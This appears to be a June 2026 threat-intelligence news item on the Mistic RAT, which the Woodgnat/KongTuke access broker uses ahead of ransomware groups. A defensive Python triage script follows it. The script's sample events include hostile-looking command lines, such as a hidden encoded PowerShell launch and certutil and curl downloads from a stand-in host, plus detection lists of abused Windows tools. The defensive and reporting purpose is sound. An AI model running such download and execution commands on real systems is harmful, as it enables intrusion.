Threat Intelligence, Jun 24, 2026

New ‘Mistic’ RAT Opens Door to Several Ransomware Families

New Mistic RAT used by Woodgnat IAB to gain access for multiple ransomware families.

Summary

A new remote access trojan (RAT) named Mistic is being deployed by the initial access broker (IAB) Woodgnat, also known as KongTuke. Woodgnat has been observed working with several ransomware groups including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, targeting organizations across various sectors opportunistically. The RAT provides typical backdoor functionalities and has been delivered via DLL sideloading, sometimes alongside credential stealers and other common Windows tools.

Full text

An initial access broker (IAB) linked to multiple ransomware families has been using a new remote access trojan (RAT) in recent attacks, Broadcom’s Symantec and Carbon Black threat hunter team reports. The threat actor, tracked as Woodgnat and KongTuke and active since at least May 2024, is known to have ties to ransomware groups such as Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta. Starting in April 2026, Woodgnat has been deploying the new Backdoor.Mistic RAT against the networks of organizations across multiple industries, including education, insurance, IT, and professional services. Previously, the threat actor was observed deploying the ModeloRAT in attacks targeting other entities. “The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector,” Broadcom’s researchers say.

Also tracked as MLTBackdoor, Mistic provides attackers with typical capabilities, including file download and upload, file manipulation, folder creation, and code execution. The attackers can also modify the frequency at which the malware checks for new commands and can instruct it to terminate itself.

Woodgnat has been deploying the backdoor as a DLL, executing it via sideloading. In a recent attack, the threat actor also deployed a credential stealer alongside Mistic. Additional tools observed in the intrusion include Curl, Reg.exe, Net (net.exe), PowerShell, Certutil, and WMIC (the Windows Management Instrumentation command-line tool), used for data exfiltration, registry manipulation, network resource management, command execution, reconnaissance, lateral movement, file download, and browser certificate installation.
The IAB is known for distributing malware via compromised WordPress sites and for relying on social engineering to entice users into executing attacker-supplied commands, including the ClickFix, FileFix, and CrashFix techniques. “In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command. While the initial compromise may be opportunistic, the attackers profile the machines for potential interest to determine their value and if they can sell access to them,” Broadcom’s threat hunter team says. Since April 2026, the threat actor has also been using helpdesk and IT-support lures delivered via Microsoft Teams to convince victims to execute malicious code.

Written by Ionut Arghire, an international correspondent for SecurityWeek.
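The tool chain and lure pattern described above (PowerShell launched from a user-facing process, Certutil and Curl as downloaders, WMIC for execution) lends itself to a simple triage rule over process-creation telemetry. The following is an added example, not code from Broadcom or from the article; the log events are constructed Sysmon-style records, and the scores and thresholds are illustrative assumptions rather than anything the report specifies.

```python
"""Score constructed process-creation events for the living-off-the-land
tool chain and ClickFix-style PowerShell launch described in the report."""
import re
from collections import namedtuple

Event = namedtuple("Event", "parent image cmdline")

# Constructed Sysmon-style events; not real telemetry from the campaign.
SAMPLE_EVENTS = [
    Event("explorer.exe", "powershell.exe", "powershell -w hidden -nop -enc AAAA"),
    Event("powershell.exe", "certutil.exe",
          "certutil -urlcache -split -f http://example.invalid/a.dat a.dat"),
    Event("cmd.exe", "reg.exe", "reg add HKCU\\Software\\Example /v x /t REG_SZ /d y"),
    Event("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    Event("powershell.exe", "curl.exe", "curl -s -o out.txt http://example.invalid/p"),
    Event("cmd.exe", "wmic.exe", "wmic process call create notepad.exe"),
]

# Binaries the report names as used by Woodgnat after initial access.
LOLBINS = {"curl.exe", "reg.exe", "net.exe", "powershell.exe", "certutil.exe", "wmic.exe"}
# Parents that should rarely spawn PowerShell directly (assumed list).
USER_FACING = {"explorer.exe", "winword.exe", "outlook.exe", "msedge.exe", "chrome.exe"}


def score_event(ev):
    """Return (score, reasons) for one event; higher means more worth a look."""
    score, reasons = 0, []
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    if img in LOLBINS:
        score += 1; reasons.append(f"living-off-the-land binary {img}")
    if img == "powershell.exe" and ev.parent.lower() in USER_FACING:
        score += 3; reasons.append("PowerShell spawned from a user-facing process (ClickFix-style lure)")
    if img == "powershell.exe" and re.search(r"\s-(?:e|enc|encodedcommand)\b", cmd):
        score += 2; reasons.append("encoded PowerShell command line")
    if img == "certutil.exe" and "-urlcache" in cmd:
        score += 3; reasons.append("certutil used as a downloader")
    if img == "curl.exe" and "://" in cmd:
        score += 1; reasons.append("curl contacting a remote host")
    if img == "wmic.exe" and "process call create" in cmd:
        score += 3; reasons.append("WMIC process creation (execution primitive)")
    return score, reasons


def triage(events, threshold=3):
    """Keep events scoring at or above the (assumed) threshold, in input order."""
    return [(ev, s, r) for ev in events for s, r in [score_event(ev)] if s >= threshold]
```

Running `triage(SAMPLE_EVENTS)` surfaces the PowerShell, Certutil and WMIC events while leaving the benign svchost.exe launch and the lone reg.exe call below the threshold.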

Indicators of Compromise

  • malware — Mistic
  • malware — MLTBackdoor
  • malware — ModeloRAT

Entities

  • Woodgnat (threat_actor)
  • KongTuke (threat_actor)
  • Qilin (campaign)
  • Interlock (campaign)
  • Rhysida (campaign)
  • Akira (campaign)